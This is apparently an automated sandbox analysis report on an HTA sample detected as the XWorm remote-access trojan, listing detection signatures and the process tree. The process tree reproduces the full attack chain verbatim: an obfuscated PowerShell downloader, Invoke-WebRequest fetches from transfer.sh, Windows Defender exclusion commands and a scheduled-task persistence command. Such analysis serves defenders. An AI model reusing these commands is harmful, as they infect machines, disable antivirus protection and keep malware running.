Windows Analysis Report
p5.hta
Overview
General Information
Detection
XWorm
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Drops PE files with a suspicious file extension
Drops large PE files
Installs a global keyboard hook
Machine Learning detection for dropped file
Potentially malicious time measurement code found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7288 cmdline: mshta.exe "C:\Users\user\Desktop\p5.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 7384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7604 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- Acrobat.exe (PID: 7832 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\W2.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
- AcroCEF.exe (PID: 8120 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- AcroCEF.exe (PID: 6892 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1572,i,10869719346348380041,10864435701899578402,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- powershell.exe (PID: 7868 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/WD631pf02G/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 8400 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- msword.com (PID: 9108 cmdline: msword.com MD5: 4CEEDA451C97AB9A9F299CBD8D60CB0F)
- powershell.exe (PID: 8056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com' MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.com' MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msword.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 8704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 8424 cmdline: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 8412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 7748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msword.exe (PID: 9128 cmdline: C:\Users\user\AppData\Roaming\msword.exe MD5: 4CEEDA451C97AB9A9F299CBD8D60CB0F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | |
| Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | |
| Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
System Summary |
---|
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): |